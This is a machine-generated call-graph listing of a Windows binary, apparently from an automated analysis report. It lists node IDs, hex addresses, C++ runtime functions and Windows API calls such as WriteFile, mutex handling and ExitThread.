17040->17043 17042 12cae19 _ValidateLocalCookies 5 API calls 17041->17042 17044 129b15c 17042->17044 17043->17032 17044->16891 17046 129b520 17045->17046 17061 129b533 17045->17061 17047 12a1be0 25 API calls 17046->17047 17065 129b52e 17046->17065 17048 129b559 17047->17048 17049 12a1be0 25 API calls 17048->17049 17048->17065 17050 129b600 17049->17050 17054 12a1be0 25 API calls 17050->17054 17050->17065 17051 129b6ea 17052 12a1be0 25 API calls 17051->17052 17051->17065 17053 129b752 17052->17053 17056 12a1be0 25 API calls 17053->17056 17053->17065 17055 129b627 17054->17055 17058 12a1be0 25 API calls 17055->17058 17055->17065 17057 129bb8e 17056->17057 17059 12a1be0 25 API calls 17057->17059 17058->17051 17060 129bbab 17059->17060 17062 12a1be0 25 API calls 17060->17062 17061->17048 17061->17050 17061->17051 17061->17053 17061->17055 17064 12a1be0 25 API calls 17061->17064 17061->17065 17066 129b893 17061->17066 17063 129bbc8 17062->17063 17067 12a1be0 25 API calls 17063->17067 17064->17046 17065->16891 17066->17065 17069 12a1be0 25 API calls 17066->17069 17068 129bbe5 17067->17068 17071 12a1be0 25 API calls 17068->17071 17070 129bc5b 17069->17070 17077 129ab7f 17076->17077 17078 129ab4f 17076->17078 17079 129ab70 17077->17079 17081 129abb1 17077->17081 17082 129aba2 17077->17082 17078->17079 17080 129a8e0 22 API calls 17078->17080 17079->16902 17080->17078 17084 129c980 23 API calls 17081->17084 17625 129d4c0 17082->17625 17084->17079 17085 129aba8 17085->16902 17087 129a8e9 std::ios_base::_Ios_base_dtor 17086->17087 17088 12cf35f std::_Facet_Register 22 API calls 17087->17088 17089 129a979 std::ios_base::_Ios_base_dtor 17087->17089 17090 129a9a0 17088->17090 17089->16908 17090->16908 17638 12a1770 17091->17638 17094 12ccd74 std::_Xinvalid_argument KiUserExceptionDispatcher 17095 12a1bfd 17094->17095 17641 12ca0fe 17095->17641 17097 129a0a8 17125 12cae62 ___std_exception_copy 17123->17125 17124 12cae7c 17124->16977 17125->17124 17126 12d5aef std::_Facet_Register 2 API calls 17125->17126 17128 12a1e60 Concurrency::cancel_current_task 17125->17128 17126->17125 17127 12cae88 17127->17127 17128->17127 17177 12ccd74 17128->17177 17130 12a1e7c 17131 12a1ed0 17130->17131 17133 12a1eb9 17130->17133 17134 12a1e96 17130->17134 17132 12a1e60 Concurrency::cancel_current_task 23 API calls 17131->17132 17135 12a1ea3 17132->17135 17137 12a1eca 17133->17137 17140 12cae5d std::_Facet_Register 23 API calls 17133->17140 17134->17131 17136 12a1e9d 17134->17136 17138 12cf35f std::_Facet_Register 22 API calls 17135->17138 17143 12a1eac 17135->17143 17139 12cae5d std::_Facet_Register 23 API calls 17136->17139 17137->16977 17141 12a1eda 17138->17141 17139->17135 17142 12a1ec3 17140->17142 17144 12a1fdb 17141->17144 17145 12a1ef3 std::locale::_Init 17141->17145 17148 12a1e80 23 API calls 17141->17148 17142->16977 17143->16977 17146 12a1d70 23 API calls 17144->17146 17145->16977 17147 12a1fe0 17146->17147 17149 12a1f6f std::locale::_Init 17148->17149 17150 12a1fba std::ios_base::_Ios_base_dtor 17149->17150 17151 12cf35f std::_Facet_Register 22 API calls 17149->17151 17150->16977 17151->17144 17153 12a1e6e Concurrency::cancel_current_task 17152->17153 17154 12ccd74 std::_Xinvalid_argument KiUserExceptionDispatcher 17153->17154 17155 12a1e7c 17154->17155 17156 12a1ed0 17155->17156 17158 12a1eb9 17155->17158 17159 12a1e96 17155->17159 17157 12a1e60 Concurrency::cancel_current_task 23 API calls 17156->17157 17160 12a1ea3 17157->17160 17162 12a1eca 17158->17162 17165 12cae5d std::_Facet_Register 23 API calls 17158->17165 17159->17156 17161 12a1e9d 17159->17161 17163 12cf35f std::_Facet_Register 22 API calls 17160->17163 17167 12a1eac 17160->17167 17164 12cae5d std::_Facet_Register 23 API calls 17161->17164 17162->16977 17169 12a1eda 17163->17169 17164->17160 17166 12a1ec3 17165->17166 17166->16977 17167->16977 17168 12a1fdb 17170 12a1d70 23 API calls 17168->17170 17169->17168 17172 12a1ef3 std::locale::_Init 17169->17172 17173 12a1e80 23 API calls 17169->17173 17171 12a1fe0 17170->17171 17172->16977 17174 12a1f6f std::locale::_Init 17173->17174 17175 12a1fba std::ios_base::_Ios_base_dtor 17174->17175 17176 12cf35f std::_Facet_Register 22 API calls 17174->17176 17175->16977 17176->17168 17178 12ccdbb KiUserExceptionDispatcher 17177->17178 17179 12ccd8e 17177->17179 17178->17130 17179->17178 17185 12c9ffb 17180->17185 17183 12ccd74 std::_Xinvalid_argument KiUserExceptionDispatcher 17184 12ca0bd 17183->17184 17188 12a1cf0 17185->17188 17191 12cc59b 17188->17191 17192 12cc5a8 ___std_exception_copy 17191->17192 17196 12a1d1d 17191->17196 17193 12cc5d5 17192->17193 17192->17196 17197 12d6dcc 17192->17197 17206 12d3434 17193->17206 17196->17183 17198 12d6dd9 17197->17198 17199 12d6de7 17197->17199 17198->17199 17202 12d6dfe 17198->17202 17200 12d3e40 __dosmaperr 11 API calls 17199->17200 17205 12d6def 17200->17205 17201 12cf34f __cftof 22 API calls 17203 12d6df9 17201->17203 17202->17203 17204 12d3e40 __dosmaperr 11 API calls 17202->17204 17203->17193 17204->17205 17205->17201 17207 12d800f _free 11 API calls 17206->17207 17208 12d344c 17207->17208 17208->17196 17210 12c9dd7 __EH_prolog3 17209->17210 17221 12ca2b4 17210->17221 17215 12c9df5 17233 12c9f53 17215->17233 17216 12c9e53 std::locale::_Init 17216->16999 17220 12c9e13 17241 12ca30c 17220->17241 17222 12ca2ca 17221->17222 17223 12ca2c3 17221->17223 17225 12c9de2 17222->17225 17253 12ca903 EnterCriticalSection 17222->17253 17248 12d4ebe 17223->17248 17225->17220 17227 12c9f30 17225->17227 17228 12cae5d std::_Facet_Register 23 API calls 17227->17228 17229 12c9f3b 17228->17229 17230 12c9f4f 17229->17230 17255 12c9cb3 17229->17255 17230->17215 17234 12c9f5f 17233->17234 17235 12c9dfd 17233->17235 17258 12ca8b1 17234->17258 17237 12a6a40 17235->17237 17238 12a6a50 17237->17238 17240 12a6a5a std::locale::_Init ___std_exception_copy 17237->17240 17239 12d3434 ___std_exception_copy 11 API calls 17238->17239 17238->17240 17239->17240 17240->17220 17242 12d4ecc 17241->17242 17243 12ca316 17241->17243 17276 12d4ea7 LeaveCriticalSection 17242->17276 17244 12ca329 17243->17244 17275 12ca911 LeaveCriticalSection 17243->17275 17244->17216 17247 12d4ed3 17247->17216 17249 12daa45 std::_Lockit::_Lockit 4 API calls 17248->17249 17250 12d4ec3 17249->17250 17254 12d4e5f EnterCriticalSection 17250->17254 17252 12d4eca 17252->17225 17253->17225 17254->17252 17256 12a6a40 std::locale::_Init 11 API calls 17255->17256 17257 12c9ced 17256->17257 17257->17215 17259 12ca8c1 RtlEncodePointer 17258->17259 17260 12d5772 17258->17260 17259->17235 17261 12d43f9 std::locale::_Setgloballocale 2 API calls 17260->17261 17262 12d5777 17261->17262 17263 12d4447 std::locale::_Setgloballocale 37 API calls 17262->17263 17266 12d5782 17262->17266 17263->17266 17264 12d578c IsProcessorFeaturePresent 17267 12d5798 17264->17267 17265 12d57ab 17268 12d664a std::locale::_Setgloballocale 35 API calls 17265->17268 17266->17264 17266->17265 17269 12cf1a3 std::locale::_Setgloballocale 8 API calls 17267->17269 17270 12d57b5 std::locale::_Setgloballocale 17268->17270 17269->17265 17271 12d7220 std::locale::_Setgloballocale 37 API calls 17270->17271 17274 12d57c7 17271->17274 17272 12d5772 std::locale::_Setgloballocale 37 API calls 17273 12d57f1 17272->17273 17274->17272 17275->17244 17276->17247 17278 12ca2b4 std::_Lockit::_Lockit 6 API calls 17277->17278 17279 12a1580 17278->17279 17280 12a15c8 17279->17280 17281 12a15e6 17279->17281 17330 12c9ecb 17280->17330 17339 12ca0de 17281->17339 17288 12ca3fa 17437 12d4ed5 17288->17437 17344 12d4de6 17330->17344 17333 12a6a40 std::locale::_Init 11 API calls 17334 12c9eef 17333->17334 17335 12c9eff 17334->17335 17336 12d4de6 std::_Locinfo::_Locinfo_ctor 66 API calls 17334->17336 17337 12a6a40 std::locale::_Init 11 API calls 17335->17337 17336->17335 17338 129b283 17337->17338 17338->17288 17434 12a1d30 17339->17434 17342 12ccd74 std::_Xinvalid_argument KiUserExceptionDispatcher 17343 12ca0fd 17342->17343 17345 12daa45 std::_Lockit::_Lockit 4 API calls 17344->17345 17346 12d4df3 17345->17346 17349 12d4b8c 17346->17349 17350 12d4b98 std::locale::_Setgloballocale 17349->17350 17357 12d4e5f EnterCriticalSection 17350->17357 17352 12d4ba6 17358 12d4be7 17352->17358 17357->17352 17383 12d4d4b 17358->17383 17360 12d4c02 17361 12d7220 std::locale::_Setgloballocale 37 API calls 17360->17361 17377 12d4bb3 17360->17377 17362 12d4c0f 17361->17362 17407 12dd4ad 17362->17407 17366 12cf37c __Getctype 11 API calls 17373 12d4c3b 17373->17366 17373->17377 17380 12d4bdb 17377->17380 17433 12d4ea7 LeaveCriticalSection 17380->17433 17382 12c9ed7 17382->17333 17384 12d4d65 17383->17384 17385 12d4d57 17383->17385 17387 12dd1e4 __cftoe 46 API calls 17384->17387 17386 12cfe5d std::_Locinfo::_Locinfo_ctor 66 API calls 17385->17386 17388 12d4d61 17386->17388 17389 12d4d7c 17387->17389 17388->17360 17390 12d4ddb 17389->17390 17391 12d7fb2 __dosmaperr 11 API calls 17389->17391 17392 12cf37c __Getctype 11 API calls 17390->17392 17393 12d4d97 17391->17393 17394 12d4de5 17392->17394 17396 12dd1e4 __cftoe 46 API calls 17393->17396 17406 12d4dbf 17393->17406 17398 12daa45 std::_Lockit::_Lockit LoadLibraryExW LoadLibraryExW FreeLibrary GetProcAddress 17394->17398 17395 12d800f _free 11 API calls 17397 12d4dd4 17395->17397 17399 12d4dae 17396->17399 17397->17360 17401 12d4df3 17398->17401 17400 12d4dc1 17399->17400 17402 12d4db5 17399->17402 17403 12cfe5d std::_Locinfo::_Locinfo_ctor 66 API calls 17400->17403 17404 12d4b8c std::_Locinfo::_Locinfo_ctor 66 API calls 17401->17404 17402->17390 17402->17406 17403->17406 17405 12d4e1c 17404->17405 17405->17360 17406->17395 17408 12dd4c4 17407->17408 17409 12dd4f6 17408->17409 17412 12dd4c8 17408->17412 17410 12d3e40 __dosmaperr 11 API calls 17409->17410 17411 12dd4fb 17410->17411 17413 12cf34f __cftof 22 API calls 17411->17413 17414 12dd509 17412->17414 17415 12dd4e9 17412->17415 17423 12d4c34 17413->17423 17417 12dd204 std::_Locinfo::_Locinfo_ctor 46 API calls 17414->17417 17416 12d3e40 __dosmaperr 11 API calls 17415->17416 17418 12dd4ee 17416->17418 17419 12dd516 17417->17419 17421 12cf34f __cftof 22 API calls 17418->17421 17420 12dd51e 17419->17420 17424 12dd52e 17419->17424 17422 12d3e40 __dosmaperr 11 API calls 17420->17422 17421->17423 17422->17423 17423->17373 17426 12d8049 17423->17426 17424->17423 17425 12d3e40 __dosmaperr 11 API calls 17424->17425 17425->17418 17427 12d8087 17426->17427 17432 12d8057 __dosmaperr 17426->17432 17432->17427 17433->17382 17435 12cc59b ___std_exception_copy 22 API calls 17434->17435 17436 12a1d5d 17435->17436 17436->17342 17562 129cab8 17561->17562 17563 129cbeb 17561->17563 17565 129cad8 17562->17565 17566 129cbbb 17562->17566 17564 129d750 23 API calls 17563->17564 17568 129cc04 17564->17568 17569 129cc2d 17565->17569 17586 129cae4 17565->17586 17610 129d750 17566->17610 17572 129cc1e 17568->17572 17575 129a8e0 22 API calls 17568->17575 17614 129cee0 17569->17614 17572->17037 17573 129cc32 17576 12cf35f std::_Facet_Register 22 API calls 17573->17576 17574 129c980 23 API calls 17577 129cbdf 17574->17577 17575->17568 17580 129cc37 17576->17580 17577->17037 17579 129cb21 17579->17573 17582 129cb64 std::ios_base::_Ios_base_dtor 17579->17582 17581 129cb8d 17606 129c980 17581->17606 17591 129cef0 17582->17591 17584 129a8e0 22 API calls 17584->17586 17586->17579 17586->17582 17586->17584 17588 129cc8a 17587->17588 17589 129cc52 17587->17589 17588->17041 17617 129ccb0 17589->17617 17592 129cf49 17591->17592 17593 129cefe 17591->17593 17596 12a1e60 Concurrency::cancel_current_task 23 API calls 17592->17596 17594 129cf0f 17593->17594 17595 129cf32 17593->17595 17594->17592 17597 129cf16 17594->17597 17598 129cf43 17595->17598 17601 12cae5d std::_Facet_Register 23 API calls 17595->17601 17603 129cf1c 17596->17603 17600 12cae5d std::_Facet_Register 23 API calls 17597->17600 17598->17581 17599 12cf35f std::_Facet_Register 22 API calls 17602 129cf53 17599->17602 17600->17603 17604 129cf3c 17601->17604 17603->17599 17605 129cf25 17603->17605 17604->17581 17605->17581 17607 129ca63 17606->17607 17609 129c9c6 17606->17609 17607->17037 17608 12983b0 23 API calls 17608->17609 17609->17607 17609->17608 17611 129d764 17610->17611 17613 129cbc8 17610->17613 17612 12a1ee0 23 API calls 17611->17612 17611->17613 17612->17611 17613->17574 17615 12ca09e std::_Xinvalid_argument 23 API calls 17614->17615 17616 129ceea 17615->17616 17619 129ccff 17617->17619 17618 129ce2a 17618->17588 17619->17618 17622 129cf60 17619->17622 17623 12ca09e std::_Xinvalid_argument 23 API calls 17622->17623 17624 129cf6a 17623->17624 17626 129d4fd 17625->17626 17627 129d73c 17625->17627 17631 129cef0 23 API calls 17626->17631 17628 129cee0 23 API calls 17627->17628 17629 129d69f 17628->17629 17630 12cf35f std::_Facet_Register 22 API calls 17629->17630 17636 129d6db std::ios_base::_Ios_base_dtor 17629->17636 17632 129d55a 17631->17632 17634 129c980 23 API calls 17632->17634 17635 129d586 17634->17635 17635->17629 17635->17636 17636->17085 17639 12cc59b ___std_exception_copy 22 API calls 17638->17639 17640 12a179b 17639->17640 17640->17094 17642 12ca108 17641->17642 17644 12ca10c 17641->17644 17642->17097 17655 129951c std::locale::_Init 17654->17655 17671 129a6b0 17655->17671 17666 12aaa00 17665->17666 17667 12aa9b5 17665->17667 17666->16967 17668 12cae5d std::_Facet_Register 23 API calls 17667->17668 17669 12aa9bc ResetEvent ReleaseMutex SetEvent 17668->17669 17669->17666 17672 129a6f1 std::locale::_Init 17671->17672 17679 129c070 17672->17679 17680 129c0c7 17679->17680 17683 129d1f0 17680->17683 17689 129d250 std::ios_base::_Ios_base_dtor 17683->17689 17684 12a1ee0 23 API calls 17684->17689 17685 129d441 17686 12cae19 _ValidateLocalCookies 5 API calls 17685->17686 17688 129d4af 17686->17688 17690 12cf35f std::_Facet_Register 22 API calls 17688->17690 17689->17684 17689->17685 17689->17688 17692 129e3c0 17689->17692 17691 129d4bd 17690->17691 17693 129e528 17692->17693 17696 129e40d 17692->17696 17695 129cee0 23 API calls 17693->17695 17694 129e523 17697 12a1e60 Concurrency::cancel_current_task 23 API calls 17694->17697 17698 129e52d 17695->17698 17696->17694 17699 129e45c 17696->17699 17700 129e483 17696->17700 17697->17693 17701 12cf35f std::_Facet_Register 22 API calls 17698->17701 17699->17694 17702 129e467 17699->17702 17703 129e478 17700->17703 17706 12cae5d std::_Facet_Register 23 API calls 17700->17706 17704 129e532 17701->17704 17705 12cae5d std::_Facet_Register 23 API calls 17702->17705 17708 129e4f1 17703->17708 17714 129f990 17703->17714 17707 129e46d 17705->17707 17706->17703 17707->17698 17707->17703 17710 129f990 22 API calls 17708->17710 17711 129e506 17710->17711 17718 129ec90 17711->17718 17713 129e518 17713->17689 17715 129f99b 17714->17715 17725 12996d0 17715->17725 17719 129ec9c 17718->17719 17722 129ecdf std::ios_base::_Ios_base_dtor 17718->17722 17720 12996d0 22 API calls 17719->17720 17721 129eca6 17720->17721 17721->17722 17723 12cf35f std::_Facet_Register 22 API calls 17721->17723 17722->17713 17724 129ed13 std::ios_base::_Ios_base_dtor 17723->17724 17724->17713 17726 12996da std::ios_base::_Ios_base_dtor 17725->17726 17727 129972f 17725->17727 17726->17727 17728 12cf35f std::_Facet_Register 22 API calls 17726->17728 17727->17708 17729 1299737 17728->17729 17731 12d7fb2 __dosmaperr 11 API calls 17730->17731 17732 12d425b 17731->17732 17733 12d800f _free 11 API calls 17732->17733 17734 12d4268 17733->17734 17735 12d428c 17734->17735 17736 12d426f GetModuleHandleExW 17734->17736 17737 12d41bc 13 API calls 17735->17737 17736->17735 17738 12d4294 17737->17738 17738->16829 17738->16832 17752 12d3e2d 17739->17752 17741 12d3e15 __dosmaperr 17742 12d3e40 __dosmaperr 11 API calls 17741->17742 17743 12d3e28 17742->17743 17743->16832 17745 12d41c8 17744->17745 17751 12d41ec 17744->17751 17746 12d41ce CloseHandle 17745->17746 17747 12d41d7 17745->17747 17746->17747 17748 12d41dd FreeLibrary 17747->17748 17749 12d41e6 17747->17749 17748->17749 17750 12d800f _free 11 API calls 17749->17750 17750->17751 17751->16282 17753 12d7377 __dosmaperr 11 API calls 17752->17753 17754 12d3e32 17753->17754 17754->17741 17756 12d414a std::locale::_Setgloballocale 17755->17756 17757 12d415e 17756->17757 17758 12d4151 ExitThread 17756->17758 17759 12d7220 std::locale::_Setgloballocale 37 API calls 17757->17759 17761 12d4163 17759->17761 17772 12dcb4e 17761->17772 17764 12d417a 17777 12aa820 17764->17777 17766 12d4196 17793 12d431d 17766->17793 17773 12dcb60 GetPEB 17772->17773 17774 12d416e 17772->17774 17773->17774 17775 12dcb73 17773->17775 17774->17764 17790 12da9d1 17774->17790 17796 12da616 17775->17796 17778 12aa82b std::ios_base::_Ios_base_dtor 17777->17778 17779 12cf35f std::_Facet_Register 22 API calls 17778->17779 17780 12aa932 std::ios_base::_Ios_base_dtor 17778->17780 17781 12aa958 17779->17781 17780->17766 17782 12aa96a 17781->17782 17783 12aa97f 17781->17783 17799 12a9db0 WaitForSingleObject 17782->17799 17785 12ccd74 std::_Xinvalid_argument KiUserExceptionDispatcher 17783->17785 17787 12aa994 17785->17787 17788 12d431d 14 API calls 17791 12da553 __dosmaperr 4 API calls 17790->17791 17792 12da9ed 17791->17792 17792->17764 17817 12d41f3 17793->17817 17797 12da553 __dosmaperr 4 API calls 17796->17797 17798 12da632 17797->17798 17798->17774 17800 12a9e9e ReleaseMutex 17799->17800 17802 12a9ec3 std::ios_base::_Ios_base_dtor 17799->17802 17801 12a9fc5 ResetEvent WaitForSingleObject 17800->17801 17800->17802 17801->17802 17802->17801 17803 12aa012 ReleaseMutex 17802->17803 17804 12aa7b2 std::ios_base::_Ios_base_dtor 17802->17804 17806 12aa7d8 17802->17806 17809 12aa032 EnterCriticalSection 17802->17809 17803->17802 17805 12cae19 _ValidateLocalCookies 5 API calls 17804->17805 17807 12aa7d4 17805->17807 17808 12cf35f std::_Facet_Register 22 API calls 17806->17808 17807->17788 17810 12aa7dd 17808->17810 17813 12aa081 CloseHandle 17809->17813 17811 12a1d70 23 API calls 17810->17811 17815 12aa78c 17813->17815 17816 12aa820 26 API calls 17815->17816 17816->17804 17818 12d7377 __dosmaperr 11 API calls 17817->17818 17821 12d41fe 17818->17821 17819 12d4240 ExitThread 17820 12d4217 17823 12d422a 17820->17823 17824 12d4223 CloseHandle 17820->17824 17821->17819 17821->17820 17826 12daa0c 17821->17826 17823->17819 17825 12d4236 FreeLibraryAndExitThread 17823->17825 17824->17823 17825->17819 17827 12da553 __dosmaperr 4 API calls 17826->17827 17828 12daa25 17827->17828 17828->17820 17832 12ca0be 17829->17832 17837 12ca035 17832->17837 17835 12ccd74 std::_Xinvalid_argument KiUserExceptionDispatcher 17836 12ca0dd 17835->17836 17838 12a1cf0 std::invalid_argument::invalid_argument 22 API calls 17837->17838 17839 12ca047 17838->17839 17839->17835 17840 12acdc0 17841 12aceeb 17840->17841 17842 12983b0 23 API calls 17841->17842 17843 12acf22 17842->17843 17868 12c7530 17843->17868 17845 12acf2d 17877 12c75f0 17845->17877 17847 12acf3a 17848 12983b0 23 API calls 17847->17848 17849 12acf5a 17848->17849 17895 1299820 17849->17895 17851 12acf72 17852 1299a40 75 API calls 17851->17852 17853 12acfbe 17852->17853 17854 12a1ee0 23 API calls 17853->17854 17855 12ad008 17854->17855 17856 12a98f0 34 API calls 17855->17856 17858 12ad020 17856->17858 17859 12ad4a2 17858->17859 17908 12c7740 17858->17908 17861 12ad8aa 17859->17861 17862 12ad593 std::ios_base::_Ios_base_dtor 17859->17862 17860 12cae19 _ValidateLocalCookies 5 API calls 17863 12ad5b6 17860->17863 17864 12cf35f std::_Facet_Register 22 API calls 17861->17864 17862->17860 17865 12ad8af 17864->17865 17866 12a1d70 23 API calls 17865->17866 17867 12ad8b4 17866->17867 17869 12c7568 17868->17869 17870 12c7562 17868->17870 17872 12a1ee0 23 API calls 17869->17872 17874 12c7578 17869->17874 17913 12e0dbe 17870->17913 17872->17874 17873 12c75c6 std::ios_base::_Ios_base_dtor 17873->17845 17874->17873 17875 12cf35f std::_Facet_Register 22 API calls 17874->17875 17876 12c75e9 17875->17876 17878 12c7621 17877->17878 17881 12c7627 17877->17881 17879 12e0dbe 65 API calls 17878->17879 17879->17881 17880 12cae19 _ValidateLocalCookies 5 API calls 17882 12c7710 17880->17882 17883 12a1ee0 23 API calls 17881->17883 17885 12c7636 std::ios_base::_Ios_base_dtor 17881->17885 17893 12c766c 17881->17893 17882->17847 17884 12c7688 17883->17884 18204 12e6770 17884->18204 17885->17880 17887 12c7716 17889 12cf35f std::_Facet_Register 22 API calls 17887->17889 17890 12c771b 17889->17890 17892 12c772f 17890->17892 17894 12e0dbe 65 API calls 17890->17894 17891 12d3e40 __dosmaperr 11 API calls 17891->17893 17892->17847 17893->17885 17893->17887 17894->17892 17896 1299839 17895->17896 17897 1299a2e 17895->17897 17899 1299a33 17896->17899 17900 1299904 17896->17900 17902 129984e std::locale::_Init 17896->17902 17898 12986e0 23 API calls 17897->17898 17898->17899 17901 12a1d70 23 API calls 17899->17901 17904 12a1e80 23 API calls 17900->17904 17906 1299947 std::locale::_Init 17901->17906 17902->17851 17903 12cf35f std::_Facet_Register 22 API calls 17905 1299a3d 17903->17905 17904->17906 17906->17903 17907 12999d8 std::ios_base::_Ios_base_dtor std::locale::_Init 17906->17907 17907->17851 17910 12c7791 17908->17910 17912 12c774d 17908->17912 17910->17858 17912->17910 18260 12dcd36 17912->18260 18273 12a6ab0 17912->18273 17914 12e0dca std::locale::_Setgloballocale 17913->17914 17915 12e0de9 17914->17915 17916 12e0dd4 17914->17916 17923 12e0de4 17915->17923 17926 12d0c86 EnterCriticalSection 17915->17926 17917 12d3e40 __dosmaperr 11 API calls 17916->17917 17918 12e0dd9 17917->17918 17920 12cf34f __cftof 22 API calls 17918->17920 17920->17923 17921 12e0e06 17927 12e0d47 17921->17927 17923->17869 17924 12e0e11 17943 12e0e38 17924->17943 17926->17921 17928 12e0d69 17927->17928 17929 12e0d54 17927->17929 17935 12e0d64 17928->17935 17946 12dad65 17928->17946 17930 12d3e40 __dosmaperr 11 API calls 17929->17930 17931 12e0d59 17930->17931 17933 12cf34f __cftof 22 API calls 17931->17933 17933->17935 17935->17924 17939 12e0d8c 17963 12e464f 17939->17963 17942 12d800f _free 11 API calls 17942->17935 18203 12d0c9a LeaveCriticalSection 17943->18203 17945 12e0e40 17945->17923 17947 12dad7d 17946->17947 17951 12dada2 17946->17951 17948 12dbe5e 22 API calls 17947->17948 17947->17951 17949 12dad9b 17948->17949 17978 12e16da 17949->17978 17952 12dae1b 17951->17952 17953 12dae44 17952->17953 17954 12dae32 17952->17954 17956 12dbe5e 17953->17956 17954->17953 17955 12d800f _free 11 API calls 17954->17955 17955->17953 17957 12dbe7f 17956->17957 17958 12dbe6a 17956->17958 17957->17939 17959 12d3e40 __dosmaperr 11 API calls 17958->17959 17960 12dbe6f 17959->17960 17961 12cf34f __cftof 22 API calls 17960->17961 17962 12dbe7a 17961->17962 17962->17939 17964 12e4675 17963->17964 17965 12e4660 17963->17965 17966 12e46be 17964->17966 17970 12e469c 17964->17970 17967 12d3e2d __dosmaperr 11 API calls 17965->17967 17968 12d3e2d __dosmaperr 11 API calls 17966->17968 17969 12e4665 17967->17969 17971 12e46c3 17968->17971 17972 12d3e40 __dosmaperr 11 API calls 17969->17972 18164 12e45c3 17970->18164 17974 12d3e40 __dosmaperr 11 API calls 17971->17974 17975 12e0d92 17972->17975 17976 12e46cb 17974->17976 17975->17935 17975->17942 17977 12cf34f __cftof 22 API calls 17976->17977 17977->17975 17979 12e16e6 std::locale::_Setgloballocale 17978->17979 17980 12e16ee 17979->17980 17982 12e1706 17979->17982 17981 12d3e2d __dosmaperr 11 API calls 17980->17981 17984 12e16f3 17981->17984 17983 12e17a1 17982->17983 17987 12e1738 17982->17987 17985 12d3e2d __dosmaperr 11 API calls 17983->17985 17986 12d3e40 __dosmaperr 11 API calls 17984->17986 17988 12e17a6 17985->17988 18002 12e16fb 17986->18002 18003 12dffe3 EnterCriticalSection 17987->18003 17990 12d3e40 __dosmaperr 11 API calls 17988->17990 17992 12e17ae 17990->17992 17991 12e173e 17993 12e176f 17991->17993 17994 12e175a 17991->17994 17995 12cf34f __cftof 22 API calls 17992->17995 18004 12e17cc 17993->18004 17997 12d3e40 __dosmaperr 11 API calls 17994->17997 17995->18002 17999 12e175f 17997->17999 17998 12e176a 18045 12e1799 17998->18045 18000 12d3e2d __dosmaperr 11 API calls 17999->18000 18000->17998 18002->17951 18003->17991 18005 12e17ee 18004->18005 18041 12e180a 18004->18041 18006 12e17f2 18005->18006 18009 12e1842 18005->18009 18007 12d3e2d __dosmaperr 11 API calls 18006->18007 18008 12e17f7 18007->18008 18010 12d3e40 __dosmaperr 11 API calls 18008->18010 18011 12e1855 18009->18011 18048 12e409b 18009->18048 18013 12e17ff 18010->18013 18051 12e1373 18011->18051 18016 12cf34f __cftof 22 API calls 18013->18016 18016->18041 18017 12e18aa 18021 12e18be 18017->18021 18022 12e1903 WriteFile 18017->18022 18018 12e186b 18019 12e186f 18018->18019 18020 12e1894 18018->18020 18028 12e188a 18019->18028 18058 12e130b 18019->18058 18062 12e0f61 GetConsoleCP 18020->18062 18024 12e18c9 18021->18024 18025 12e18f3 18021->18025 18022->18028 18029 12e18ce 18024->18029 18030 12e18e3 18024->18030 18087 12e13e4 18025->18087 18033 12e194d 18028->18033 18034 12e1977 18028->18034 18028->18041 18029->18028 18074 12e14bf 18029->18074 18080 12e15a8 18030->18080 18035 12e196b 18033->18035 18036 12e1954 18033->18036 18039 12d3e40 __dosmaperr 11 API calls 18034->18039 18034->18041 18038 12d3e0a __dosmaperr 11 API calls 18035->18038 18037 12d3e40 __dosmaperr 11 API calls 18036->18037 18040 12e1959 18037->18040 18038->18041 18042 12e198f 18039->18042 18044 12d3e2d __dosmaperr 11 API calls 18040->18044 18041->17998 18043 12d3e2d __dosmaperr 11 API calls 18042->18043 18043->18041 18044->18041 18163 12e0098 LeaveCriticalSection 18045->18163 18047 12e179f 18047->18002 18093 12e4004 18048->18093 18115 12e2ff4 18051->18115 18053 12e1384 18054 12e13da 18053->18054 18055 12d7220 std::locale::_Setgloballocale 37 API calls 18053->18055 18054->18017 18054->18018 18056 12e13a7 18055->18056 18056->18054 18057 12e13c1 GetConsoleMode 18056->18057 18057->18054 18059 12e1362 18058->18059 18061 12e132d 18058->18061 18059->18028 18060 12e48de CreateFileW CloseHandle WriteConsoleW WriteConsoleW 18060->18061 18061->18059 18061->18060 18124 12d14c0 18062->18124 18064 12cae19 _ValidateLocalCookies 5 API calls 18065 12e1309 18064->18065 18065->18028 18066 12d53a4 __Getctype 37 API calls 18071 12e0fbd std::locale::_Init 18066->18071 18067 12db193 46 API calls __fassign 18067->18071 18068 12e125d 18068->18064 18071->18066 18071->18067 18071->18068 18072 12e11e0 WriteFile 18071->18072 18073 12e1218 WriteFile 18071->18073 18132 12e1a1a 18071->18132 18142 12df2d2 18071->18142 18072->18068 18072->18071 18073->18068 18073->18071 18075 12e14ce 18074->18075 18076 12e158d 18075->18076 18078 12e1543 WriteFile 18075->18078 18077 12cae19 _ValidateLocalCookies 5 API calls 18076->18077 18079 12e15a6 18077->18079 18078->18075 18078->18076 18079->18028 18081 12e15b7 18080->18081 18084 12df2d2 __cftof WideCharToMultiByte 18081->18084 18085 12e16bf 18081->18085 18086 12e1676 WriteFile 18081->18086 18082 12cae19 _ValidateLocalCookies 5 API calls 18083 12e16d8 18082->18083 18083->18028 18084->18081 18085->18082 18086->18081 18086->18085 18092 12e13f3 18087->18092 18088 12e14a4 18089 12cae19 _ValidateLocalCookies 5 API calls 18088->18089 18090 12e14bd 18089->18090 18090->18028 18091 12e1463 WriteFile 18091->18088 18091->18092 18092->18088 18092->18091 18102 12e025f 18093->18102 18095 12e4016 18096 12e401e 18095->18096 18097 12e402f SetFilePointerEx 18095->18097 18098 12d3e40 __dosmaperr 11 API calls 18096->18098 18099 12e4047 18097->18099 18101 12e4023 18097->18101 18098->18101 18100 12d3e0a __dosmaperr 11 API calls 18099->18100 18100->18101 18101->18011 18103 12e026c 18102->18103 18104 12e0281 18102->18104 18105 12d3e2d __dosmaperr 11 API calls 18103->18105 18106 12d3e2d __dosmaperr 11 API calls 18104->18106 18108 12e02a6 18104->18108 18107 12e0271 18105->18107 18109 12e02b1 18106->18109 18110 12d3e40 __dosmaperr 11 API calls 18107->18110 18108->18095 18111 12d3e40 __dosmaperr 11 API calls 18109->18111 18112 12e0279 18110->18112 18113 12e02b9 18111->18113 18112->18095 18114 12cf34f __cftof 22 API calls 18113->18114 18114->18112 18116 12e300e 18115->18116 18117 12e3001 18115->18117 18120 12e301a 18116->18120 18121 12d3e40 __dosmaperr 11 API calls 18116->18121 18118 12d3e40 __dosmaperr 11 API calls 18117->18118 18119 12e3006 18118->18119 18119->18053 18120->18053 18122 12e303b 18121->18122 18123 12cf34f __cftof 22 API calls 18122->18123 18123->18119 18125 12d14e0 18124->18125 18131 12d14d7 